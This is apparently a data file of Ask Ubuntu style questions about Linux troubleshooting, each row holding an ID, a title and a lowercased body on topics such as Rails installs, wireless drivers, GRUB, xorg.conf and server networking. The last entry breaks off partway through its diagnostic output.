246979	how to update rails version from 2.3.14 to 3.2.11 ?	i am using ruby 1.9.3 and i need to update rails version or need to reinstall the latest version but in vain . i 've tried to install rails ( sudo gem install rails ) , showing : building native extensions . this could take a while ... error : error installing rails : error : **failed to build gem native extension** . /usr/bin/ruby1.9.1 extconf.rb /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in **`require ' : can not load such file -- mkmf ( loaderror ) ** from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:1 : in ` < main > ' gem files will remain installed in /usr/lib/ruby/gems/1.9.1/gems/json-1.7.6 for inspection . results logged to /usr/lib/ruby/gems/1.9.1/gems/json-1.7.6/ext/json/ext/generator/gem_make.out where to go from here ? i am not able to remove rails because of installing rails with sudo command .
246981	how to reduce size of an image from 130 kb to between 20kb - 50 kb	as per a requirement mentioned here the size of photos submitted should be between 20kb-50kb . i have my scanned photos which have been cropped but the sizes are still ~139 kb . if i reduce the pixels then the size of image goes less than 20kb in case one and less than 10 kb in case two . i have to reduce the pixel size but the weight in bytes is also going down at the same time which is not allowed on my link.these are scanned photos in jpeg format . the program i 'm using is gimp . if this is possible in gimp then how do i do so ? if i ca n't do what i need in gimp , is there any other program for the same ?
246982	can wine and its programs be set to use ubuntu file manager instead of wine explorer ?	when browsing directories in a windows program installed in wine - like when opening a folder in foobar2000 - wine always opens the wine explorer . is it possible to set wine to open an ubuntu file manager instead ?
246992	splitting a large package into smaller ones/upgrade path for users ?	i maintain a couple of large packages that we use internally and starting with the next release i would like to split those into smaller packages . these packages are already installed in a number of machines via our custom apt repository and i am not sure what the upgrade path would be for those who already have this big packages installed . to illustrate the issue : packagex is the current big package installed in a number of machines i would like to split it into : packagex-foo packagex-bar packagex-baz i guess the sensible thing to do would be to create a virtual package called packagex that encapsulates all of the new packages , does that sound about right ? how can i ensure that an apt-get update & & apt-get upgrade would n't break things for users ? thanks .
246994	realtek rtl8723ae wireless not working on ubuntu 12.10	my laptop is toshiba satellite c850 . network adapter is realtek rtl8723ae wireless lan 802.11n pci-e nic . it 's on ubuntu 12.10 amd x64 . i tried many things but it never works . is it wont be supported ?
246995	activation/download of quick start ?	where/how can i download ubuntu quick start 'cause when i open i open my pc using it , on the screen there 's a message telling me to install it ... also , is the quick start worth using it ?
247002	share connection without nat	how to share a connection on ubuntu server without nat eth0 : 192.168.10.156 eth1 : 192.168.5.1 i am creating a cache server with tproxy ( squid 3.1 ) , but in my network will not use nat as to deliver ip publicos all machines . in all the tutorials that were always observe the configuration of ubuntu server always used nat . but need this model : eth1 ( 192.168.5.1 ) > it receives the data and passes it to eth0 ( 192.168.10.156 internet ) squid does its processing and returns the data to the network ! this works with nat , but do not want to use nat because the squid configuration is with tproxy ( transparent > ip client that should appear on the internet and not squid `` would nat '' )
247003	is there a way to stop dropbox from opening firefox as its default when viewing the dropbox webpage ?	i have dropbox installed on my ubuntu desktop 12.10 , i also have firefox and chrome installed . chrome is my default browser , i have checked in my mimeapps.list and its all correct . yet for some reason the integration of dropbox opens firefox when i use the `` launch dropbox website '' option from the menu , is there a file somewhere this is looking at as i would like it to open in chrome which i mostly have already running than launching a new instance of firefox ? or could this be a dropbox bug ?
247010	why am i getting 'file not found ' when trying to run cewe fotobuch / kruidvat fotoservice on my 64 bit system ?	when i install the cewe fotobuch ( rebranded as `` kruidvat fotoservice '' in the netherlands ) software on my 64 bit system , the application does not start . instead , i 'm getting a 'file not found ' error . but the files are there ! what 's going on ?
247013	issue installing modem zte ac682 ui on ubuntu 12.0.4	unable to make connection to internet using my modem zte ac682 ui on ubuntu 12.0.4 lts iwan @ iwan-quadra-ne-1003 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 10f1:1a21 importek bus 001 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 002 device 003 : id 19d2 : ffdd zte wcdma technologies msm iwan @ iwan-quadra-ne-1003 : ~ $
247017	battery status not displayed on ubuntu 12.04 for toshiba laptop	i am using a toshiba satellite l650 and i have ubuntu 12.04 lts installed with all the updates . however , i can not see the battery status in the notification area .
247018	gnome 3.4 work at fallback mode with two monitors	i have : ubunte 12.04 nvidia 8400 gs installed nvidia-common and xorg.conf like that : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer v233h '' horizsync 30.0 - 94.0 vertrefresh 49.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` acer v233h '' horizsync 30.0 - 94.0 vertrefresh 49.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` metamodes '' `` dfp : 1920x1080_60_0 +0+0 ; dfp : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 ; dfp : 1920x1080_60_0 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection so , when i start gnome-shell ( version 3.4 ) i get it at fallback mode . when i use xorg.conf like : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer v233h '' horizsync 30.0 - 94.0 vertrefresh 49.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 ; dfp : 1920x1080_60_0 +0+0 '' subsection `` display '' depth 24 endsubsection endsection gnome-shell works fine with one monitor . how can i fix it ? ? ?
247020	error when i boot	i 'm trying to install ubuntu 12.04 , via cd and usb . when i put them on my laptop computer , it shows the following : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . my laptop 's specifications : cpu : intel pentium m 725 1.6ghz vga : geforce fx go5200 64mb ram : 1gb ddr it is an older machine . my question is , why is this error appearing and how to i solve it ?
247028	how to fix that only one out of four cores of my cpu is detected ?	i have an acer aspire m5640/m3640 pc , featuring a intel core 2 q8200 ( quad-core ) processor running ubuntu 12.04 . now it seems to only recognize just one cpu core . lscpu outputs : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 1 on-line cpu ( s ) list : 0 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 10 cpu mhz : 2333.403 bogomips : 4666.80 l1d cache : 32k l1i cache : 32k l2 cache : 2048k numa node0 cpu ( s ) : 0 i would have expected to have core ( s ) per socket and cpu ( s ) to have 4 listed as value here . an important note is that i ca n't boot it regularly , but i need the nolapic kernel boot parameter to avoid a hard freeze during boot . speaking of booting , the firmware version is version : r01-c2 any thoughts on the ability to use all four cores will be highly appreciated . more info dmesg gives : [ 0.000000 ] nvidia board detected . ignoring acpi timer override . [ 0.000000 ] if you got timer trouble try acpi_use_timer_override [ 0.000000 ] sfi : simple firmware interface v0.81 http : //simplefirmware.org [ 0.000000 ] intel multiprocessor specification v1.4 [ 0.000000 ] mptable : oem id : nvidia [ 0.000000 ] mptable : product id : mcp73 [ 0.000000 ] mptable : apic at : 0xfee00000 [ 0.000000 ] processor # 0 ( bootup-cpu ) [ 0.000000 ] processor # 1 [ 0.000000 ] processor # 2 [ 0.000000 ] processor # 3 [ 0.000000 ] ioapic [ 0 ] : apic_id 4 , version 17 , address 0xfec00000 , gsi 0-23 [ 0.000000 ] processors : 4 [ 0.000000 ] smp : allowing 4 cpus , 0 hotplug cpus and lshw -class cpu *-cpu description : cpu product : intel ( r ) core ( tm ) 2 quad cpu q8200 @ 2.33ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) 2 quad cpu q8200 @ 2.33ghz serial : to be filled by o.e.m . slot : socket775 m/b size : 2333mhz capacity : 2333mhz width : 64 bits clock : 333mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm configuration : cores=4 enabledcores=4 threads=4 *-processor unclaimed description : co-processor product : mcp73 co-processor vendor : nvidia corporation physical id : 3.3 bus info : pci @ 0000:00:03.3 version : a2 width : 32 bits clock : 66mhz capabilities : bus_master configuration : latency=0 maxlatency=1 mingnt=3 resources : memory : fce80000-fcefffff and dmidecode : bios information vendor : american megatrends inc . version : r01-c2 release date : 02/26/2009 address : 0xf0000 runtime size : 64 kb rom size : 1024 kb characteristics : isa is supported pci is supported pnp is supported apm is supported bios is upgradeable bios shadowing is allowed escd support is available boot from cd is supported selectable boot is supported bios rom is socketed edd is supported 5.25 '' /1.2 mb floppy services are supported ( int 13h ) 3.5 '' /720 kb floppy services are supported ( int 13h ) 3.5 '' /2.88 mb floppy services are supported ( int 13h ) 8042 keyboard services are supported ( int 9h ) serial services are supported ( int 14h ) printer services are supported ( int 17h ) cga/mono video services are supported ( int 10h ) acpi is supported usb legacy is supported ls-120 boot is supported atapi zip drive boot is supported bios boot specification is supported targeted content distribution is supported bios revision : 8.15 system information manufacturer : acer product name : aspire m5640/m3640 version : r01-c2 serial number : 91eer71zcp93401dda1800 uuid : not present wake-up type : power switch sku number : to be filled by o.e.m . family : to be filled by o.e.m . base board information manufacturer : acer product name : mcp73pv version : nvidia mcp73 serial number : 000000000 asset tag : to be filled by o.e.m . features : board is a hosting board board is replaceable location in chassis : to be filled by o.e.m . chassis handle : 0x0003 type : motherboard contained object handles : 0
247029	installing ubuntu 12.04 on asus zenbook ux32a	i used to use ubuntu on my old pc . i have just bought my first laptop an asus ux32a . i have created a usb ( working one i hope ) i am not sure how to go about doing this and where i should down load it . i have considered 3 options 1 putting it in a partition on the os half of main drive . 2 putting on the 24g ssd drive 3 removing windows 8 completely and putting it in its place . i have a few concerns about losing asus software and losing windows 8 completely . what is the best option for me ?
247031	keep track of what is on usb devices	is there any software that keeps track of the content of usb devices i connect to my system ? i have several ( ~15 ) usb-sticks and i ca n't remember were i put certain files/pictures etc . using ubuntu 12.04 lts 64bit .
247033	why is my laptop running so hot with ubuntu ?	i have pretty decent laptop and should be more than enough for running ubuntu for browsing and watching movies , but ubuntu seems to be getting much hotter than it should , compared to win 7 . i 'm on ubuntu 12.10 . i have asus n53sv . cpu : intel速 core i7-2630qm ram : 6gb ddr3 gpu : nvidia geforce gt 540m here 's picture of xsensor when i have only firefox open , it should be around 40c so that 's 20c more than usual .
247034	ubuntu 10.04 alternate has no gui	i just installed ubuntu 10.04.4-alternate as i would like to have the feature of encryption lvm . but after installation , the system boot into text mode , like ubuntu server but not ubuntu desktop . is it so that alternate version does n't provide gui feature ? ?
247038	ubuntu compatibility on the lenovo b580 laptop	i 'm planning to buy a new laptop and i would like to use ubuntu as my os . i 've zoomed in on this lenovo : model : b580 specs : intel core i5-3210m , ( dual-core ) , 3 mb cache 4 ( +4 ) gb ram , intel hm77 express chipset , intel hd 4000 graphic card , 1 tb hard-drive . this laptop comes with windows 8 pre-installed . i 'd appreciate it if you let me know your experience if you 've installed ubuntu on such a configuration . are there any problems ? disclaimer : my knowledge of computer hardware/os is limited . jargon-free answers will be much appreciated . thanks !
247039	why is it a difference between the displayed versions of lxpanel ?	i am in lubuntu quantal and when trying to see lxpanel version i see the following : ~ $ apt-cache policy lxpanel lxpanel : installed : 0.5.10+git20120823-0ubuntu1 candidate : 0.5.10+git20120823-0ubuntu1 version table : *** 0.5.10+git20120823-0ubuntu1 0 500 http : //fr.archive.ubuntu.com/ubuntu/ quantal/universe i386 packages 100 /var/lib/dpkg/status dpkg -l lxpanel and synaptic give the same info , while in pcmanfm help/about it 's 0.5.11 . what does this mean ? ( this is related to this answer here . )
247041	keyboard shortcut for gnome-terminal profile change ?	i have two profiles in my gnome terminal , one uses specific image for background . would like to switch between them when i enter/exit vim . so far , i do this by alt+t and navigating to the other profile . but would like to have this automated . possible scenarios : vim newfile # profile changes to vim-one : q # it changes back to default vim conffile # profile changes to vim-one ctrl-z # vim is suspended , default profile enters cmd_that_uses_changed_config_file fg # vim is brought back from suspension , profile changes again ... now i realize that automating this fully may be difficult , so keyboard shortcut to do this is perfectly fine . i searched gnome terminal shortcuts but terminal menu has three of them only : title , reset , reset and clear . any ideas , hints or pointers ? : - )
247042	what does this info mean when i fire `dpkg -l lxpanel` ?	when trying to see the version of lxpanel and fire dpkg -l lxpanel , i get ~ $ dpkg -l lxpanel desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii lxpanel 0.5.10+git20 i386 lxde panel are there some errors that have to be solved ?
247043	recording audio on ubuntu	i want to record audio on several channels ( mic , guitar , bass ) , but i ca n't get a hang of it . i have a fender mustang ii guitar amp which i 'm connecting via usb and a mic that connects through the standard mic jack . so far i 've tried installing fl studio on wine but i do n't have the fenderasio driver so the amp is not recognized by the program . i also tried both lmms which did n't recognize any input device and audacity which recognized all the inputs but i was able to record sound only from my amp and only on one track . whenever i tried to record on multiple tracks the whole computer freezes and i have to do a hard reset . any suggestins ?
247044	automatically mirror a directory in ubuntu	running ubuntu 12.04 i have a library of personal files and documents stored in dropbox . i want the dropbox folder to be automatically mirrored to a directory in the local machine , as a backup to the backup . i want it to be done automatically . in other words , each time i add a file/folder to the dropbpx , that file/folder is copied automatically to the second location on the local drive . any ideas , tips or advices would be appreciated . best regards
247045	grub not defaulting to latest kernel in 12.10	i upgraded to 12.10 ( 32-bit ) a few weeks ago ( from 12.04 ) and everything has been running fine . a few days ago , the updater installed the latest kernel ( 3.5.0.22 ? ) and since then i always have to manually select the latest kernel when booting . i tried looking for /etc/default/grub but that file did n't exist . i installed grub customiser but that , apart from taking minutes to appear , suggested that the default kernel was '0 ' . but it did create a small /etc/default/grub file with the following entries : grub_default= '' 0 '' grub_timeout=10 grub_savedefault= '' false '' # unnamed_option= '' '' i have run sudo update-grub and have also tried changing the default from `` 0 '' to 0 but grub insists on defaulting to the previous kernel . uname -a in the manually-selected latest kernel gives : linux typhoon 3.5.0-22-generic # 34-ubuntu smp tue jan 8 21:41:11 utc 2013 i686 i686 i686 gnu/linux letting the boot timeout and select the default kernel results in : linux typhoon 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:52:46 utc 2012 i686 i686 i686 gnu/linux the boot menu looks like this : my machine has 2 hard disks . the main disk is dual-boot with 12.10 ( default ) and winxp . the 2nd disk is purely for data and is n't mounted automatically i.e . selecting it in nautilus always mounts it before displaying anything . it is available to both operating systems and is formatted as ntfs . fdisk -l results in : sda1 is the winxp partition .
247053	can i compile a windows only software for ubuntu	i understand that some of you might think that i have some brain problems if i am asking a question like this , but i could not find an answer by googling so i want to ask you this question pleas do not flame me so can i compile and use `` media player classic '' in ubuntu ( using source code ) considering there is only windows build available of this software ? ? thank you in advanced
247054	java exception : no such file or directory	i am trying to run a gate application via jetty web application server in ubuntu . i am getting java.io.ioexception : error=2 , no such file or directory because of a particular gate plugin ( multipax ) which is trying to access `` minipar.linux '' located in web-inf/gate-files/application-resources/parser_minipar/minipar.linux i have set read and write permissions to this file and directory , as well as allowing executing the file as a program . i get a permission denied error , when disallowing program execution . i have set all directories containing the file +x via chmod -r 755 /all/directories/up/to/file/ is this a file permission problem ? or could there be another cause ?
247063	create dsl connection using bash script and connect using the same	i have been using ubuntu live os everyday as my internal hard drive has gone for replacement . on every boot up i need to create a dsl connection to connect to the internet which is a mundane task . i need to write a bash script for the same .
247064	wireless does n't work after update	i 've installed ubuntu 12.04 on a new compaq cq58 laptop . after installing ubuntu wifi dind't work , but following instructions on the forum i could install the drivers and make it work ... .now after updating wireless stopped working ... i do n't know what to do now ... ~ $ sudo rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no ~ $ lspci -nn | grep 0280 04:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ]
247069	is there support available/a driver that works/ for the ati hd 5650 graphic card in 1210 ?	i have used several distros of ubuntu , but there seems to be a slight problem : my video card does n't seem to be supported . i love the cinnamon interface but it only works with the default driver and it only works with bugs ( sometimes a blank screen appear after the start-up with the cursor ) in 12.10 . when i use the propiatory driver , it looks like the mate interface . with the default vga driver , it looks good , but it is laggy . is there a solution to these driver issues ?
247076	how to determine whether a process is actively using internet	i want to write a script which start/resume downloading big file using a download manager say wget only if the browser [ say firefox ] is not loading anything [ actively not using internet ] . how can i check from a script whether a process actively using internet or not ? ss -p will give the connected process but ca n't say wheter they are active or not nethogs is a visual solution but i ca n't use it in script due to its dynamic nature
247077	upstart is not seeing my new script	i 've added a new script to /etc/init/ called minecraft.conf which contains the script : start on startup stop on shutdown respawn respawn limit 20 5 script export home= '' /root '' exec /root/minecraft/start.sh 2 > & 1 > > /var/log/minecraft.log end script post-start script echo `` minecraft started '' when i try start minecraft i get the error : start : unknown job : minecraft i 've tried running initctl list and my minecraft job is not listed . i 've tried running initctl reload-configuration and it does n't make any difference . other jobs listed by initctl list work fine with start , stop and restart . why wo n't upstart see my new script ?
247080	getting primay domain controller to work	i am setting up a primary domain controller on a small office network . i am following this guide https : //help.ubuntu.com/12.04/serverguide/samba-dc.html i got it working on one machine a few weeks ago but now there is a new server . and the thing is i did not understand fully what i was doing the first time so i would appreciate if someone could clarify a few places in this guide . sudo net groupmap add ntgroup= '' domain admins '' unixgroup=sysadmin rid=512 type=d then a note says change sysadmin to whichever group you prefer . i prefer ? i dont know what i prefer here . what you recommend ? and what implications will this have ? will this mean that all unix user in this group would have domain admin status ? if meaning anything.. then this comes net rpc rights grant -u sysadmin `` example\domain admins '' ... . here sysadmin is the username , not group correct ? and example is the name of my workgroup set earlier . sysadmin is the name of the user i would use to register machines and add new users to the unix/samba , right ?
247081	debootstrap error while upgrading from 10.04 to 12.04	i made a version upgrade with apt-get dist-upgrade and i had this error while upgrading packages : 2013-01-24 08:49:32 upgrade debootstrap 1.0.37ubuntu1~lucid1 1.0.39ubuntu0.2 2013-01-24 08:49:32 status half-installed debootstrap 1.0.37ubuntu1~lucid1 first i thought that the debootstrap package was corrupt so i cleaned the package cache an re-downloaded the updates and did n't worked . then i tried removing the previous version and then install this one of the package but i got this : dpkg : error processing debootstrap ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : debootstrap now i 'm stuck with a inconsistent os because i can not finish the upgrade because this package conflict is telling me to do a dpkg -- configure -a that gets stuck in this : preparing to replace debootstrap 1.0.37ubuntu1~lucid1 ( using ... /debootstrap_1.0.39ubuntu0.2_all.deb ) ... unpacking replacement debootstrap ... so what can i do about this ?
247084	difference between alternate and desktop 64 bit ? and how do i find out which one i am using now ?	my system has crashed because of deleting a partition that i should not have deleted . now i want to create a liveusb but i am confused whether i should make the liveusb with the alternate of desktop version of the 64bit ubuntu ... ( i am now stuck in the grub rescue , 1- how do i find out which one i used install my current ubuntu ? 2- if i need to make a liveusb with the 64 bit desktop version of ubuntu . what software can i use to make the usb ? the program that was suggested in the topic 'boot rescue ' only allows to create an alternate 64 bit not a desktop one ... thanks for your help..
247087	mount writable subfolder of read only ntfs partition	i have dual boot ( win7/ubuntu 12.04 ) system . i want to mount a specific folder ( namely the dropbox folder ) from my windows partition in my home directory . unfortunately , i am not able to do that . as far as i understand , i can not 'directly ' mount only a folder from a partition , but have to mount the entire partition first and then mount -- bind the folder . if i mount the partition writable , there are no problems . but if i mount the partition with sudo mount -r /dev/sda2 /mnt/win and afterwards try sudo mount -- bind -w /mnt/win ~/dropbox/ it says mount : warning : /home/ope/dropbox/ seems to be mounted read-only . i also tried it using /etc/fstab , following the solution given here . the relevant fstab lines look like this : /dev/sda2 /mnt/win ntfs user , ro , umask=0222 , defaults 0 0 /mnt/win/dropbox /home/ope/dropbox ntfs-3g rbind , user , rw , defaults 0 0 # /mnt/win/dropbox /home/ope/dropbox ntfs-3g rbind , user , rw , umask=0222 , defaults 0 0 the last two lines both create only a read-only mounted folder . is there antything i am missing ? thank you very much for any hints .
247097	how to remove fade effect when `` hiding all normal windows '' with ctrl+alt+d shortcut ( show desktop ) ?	i 'm using unity on 12.10 , with most of the compiz effects disabled . i 'd like to remove the fade effect when using the ctrl+alt+d default shortcut to show the desktop . the effect consists in fading out the active windows and fading 'em in when they get focus again . i could n't find anything in ccsm or dconf to set the value of the fade effect to zero .
247107	is it possible to get pdfedit running on ubuntu 12.10 using qt3to4 ?	pdfedit is pretty much the only foss low-level pdf-editing tool out there . it 's pretty useful , and pretty recent since it 's updated in 2012 . however , it 's a shame that packages are nowhere to be found , and i can not get it to compile from the source code on recent distro 's . aparently , this software uses an ancient form of qt called qt3 . in order to build qt3 apps on qt4 systems , there is this library called libqt4-qt3support and this tool called qt3to4 in the package libqt4-dev-bin . the idea is to convert the source code and compile the source with qt3-support . i know nothing about qt , but the basic idea is this , while in the root directory of the project . convert the qt3 source to qt4 : qt3to4 -alwaysoverwrite ./src/gui/* remove the qt3 check from configure by commenting the check out : nano ./configure # isqmake3=` $ testbin -- version 2 > & 1 | grep '3\. [ 0-9 ] [ 0-9 ] *\ . [ 0-9 ] [ 0-9 ] *'` # if test -z `` $ isqmake3 '' # then # testbin= '' '' # fi configure : ./configure make : make & & sudo make install but make quits with an error : ... make [ 1 ] : leaving directory `/tmp/pdfedit/src' make : *** [ source ] error 2 so , does anyone have the knowledge to make this work ? it would be awesome . we can then apply this to other packages as well . and we can finally answer this question . : )
247115	remote desktop for multiple users	this is an old question . is there something like remote desktop but have multiple users logging into their own desktop ? well as at home windows xp remote desktop .
247120	installed ubuntu with wubi on windows 7 . when i 'm booting up the computer , my keyboard wo n't respond and i ca n't switch to ubuntu	after i installed ubuntu with wubi , i rebooted my computer and ubuntu loaded up fine . i then restarted the computer to see if i could switch in to windows , which i could . and then once again i tried restarting to get back in to ubuntu , which is when i ran in to my problem . on the boot screen to select the os , the computer would n't respond to my keyboard ( razer deathstalker ) and i could n't choose ubuntu , it just loaded windows after time ran out . is there any way to get my keyboard to work , or to force my computer to restart in to ubuntu ? thanks .
247123	how to emulate the super key ?	i use an extremely old retro-keyboard ... . `` tvs 101.pc-xt '' this keyboard has only 101 keys ( alphanumeric , numpad , functionkeys ) ; and i do n't intent to change it for i am very comfortable with it ! since this keyboard does n't have a super key ( windows key ) , i am looking for some way out that i can emulate this . i am looking for a shortcut key combination like ctrl+shift+sysrq which might behave as key when used in combination altogether ? note : i 've already gone through this , however this in not the workout in my case since i do n't use gnome ( no chance for gnome settings ) .. i am on ubuntu minimal + cinnamon.. i am also unable to locate the xmodmap commands to achieve this !
247127	how to install an ati 3650 video driver on 12.10 ?	i have a fresh ubuntu 12.10 x86_64 installation but i ca n't find a way to install a specific video driver for the ati 3650 video board . ca n't find restricted drivers in unity and the amd ati legacy driver complains about `` missing tools '' during installation .
247129	ubuntu 12.04 wo n't boot after windows crash	i am dual-booting ubuntu 12.04 with windows 7 home version . i installed it on november 3 , and it has been working fine , sans some screen freezes that i 've learned are a common issue . last night , i started having issues with windows freezing shortly after logging in ( the desktop would pop up and freeze after ~10-20 seconds ) . i tried doing a system restore from safe mode , to no avail . after playing a bit with the startup programs and services , i have it running normally again . however , when i choose ubuntu on the boot screen , it does n't even get to the loading point . i see the errors `` no wubildr '' and `` prefix not set , '' but i 've seen these before with no consequence to the system actually running . after that , i just get a blank purple screen . i 've waited ~5 minutes for something to happen , but nothing does . i do n't get any sort of error messages , either . in my c : / drive , in ubuntu/disks , i notice that the root.disk file was modified yesterday at 4 pm , before i had any issues with windows . all other files and applications have not been modified since november 3 . so , it could be that this is an issue independent of the windows crash . in any case , i do n't really know where to start here . any help is appreciated .
247130	dual boot with primary windows	i 've installed lubuntu on my computer , but i let to be windows primary . how do i get to lubuntu ? i have no offer list while booting windows , windows is booting automatically without chance to change it to lubuntu .
247131	long waiting delay on wordpress	i have just installed wordpress ( last version ) on /var/www/wordpress on a default ubuntu server 12.04 lamp installation . every time i want to load something on this wordpress ( even the login screen ) the browser says `` waiting for 127.0.0.1 '' or `` waiting for localhost '' for at least 10 seconds ! ( then the page loads very fast ) i have been looking for an answer online for almost 3 hours , also tried to reinstall twice , eliminated ipv6 entries from hosts.conf , changed database host on wp-config.php from localhost to 127.0.0.1 and checked apache2 default configuration , enabling modrewrite and reviewing configuration files for default and default-ssl sites . i 'm about to give up ... why does it go so slow ? i have also a drupal install on /var/www/drupal and it does n't have this delay ! ( note the ubuntu install is in an oracle virtual box with 1 core and 1gb of ram assigned , and the delay is the same if i load the page from the host browser using the virtual interface ip ) [ edit ] after asigning 4 cores to the virtual machine instead of just one , the delay goes down to only 1 second . the cpu is n't busy at all during this time , though , which makes it even more mysterious ...
247132	where can i find tracker-sparql-0.16 ?	im trying to build nautilus , but i need tracker-sparql-0.16 . where can i find tracker-sparql-0.16 ? thank you .
247134	how to install a driver	i would like to install a driver ( ending with tar.gz ) am a new ubuntu user . which command do i use in the terminal to retrieve and install a specific driver ? cheers
247136	server can not connect to anything outside of the lan	i 'm trying to set up ubuntu server . during the installation , it says `` network autoconfiguration failed '' when i try to use dhcp . this is odd because my ubuntu laptop on the same network can use dhcp with no apparent problems . if i configure the network settings manually , using the same network settings as my laptop except with a different ip address , i can connect to other machines on the network but not to the internet . here 's some diagnostic information , comparing my working laptop with my non-working server : laptop $ ifconfig eth0 eth0 link encap : ethernet hwaddr 88 : ae:1d : e6 : ec : de inet addr:10.0.53.35 bcast:10.0.53.255 mask:255.255.255.0 inet6 addr : fe80 : :8aae:1dff : fee6 : ecde/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:21888 errors:0 dropped:60 overruns:0 frame:0 tx packets:14328 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:25901268 ( 25.9 mb ) tx bytes:1353862 ( 1.3 mb ) $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.53.254 0.0.0.0 ug 0 0 0 eth0 10.0.53.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 $ ping -c 4 10.0.53.254 ping 10.0.53.254 ( 10.0.53.254 ) 56 ( 84 ) bytes of data . 64 bytes from 10.0.53.254 : icmp_req=1 ttl=64 time=0.673 ms 64 bytes from 10.0.53.254 : icmp_req=2 ttl=64 time=0.493 ms 64 bytes from 10.0.53.254 : icmp_req=3 ttl=64 time=0.562 ms 64 bytes from 10.0.53.254 : icmp_req=4 ttl=64 time=0.534 ms -- - 10.0.53.254 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2998ms rtt min/avg/max/mdev = 0.493/0.565/0.673/0.070 ms server $ ifconfig eth0 eth0 link encap : ethernet hwaddr 00:0d:61:31 : d8:38 inet addr:10.0.53.153 bcast:10.0.53.255 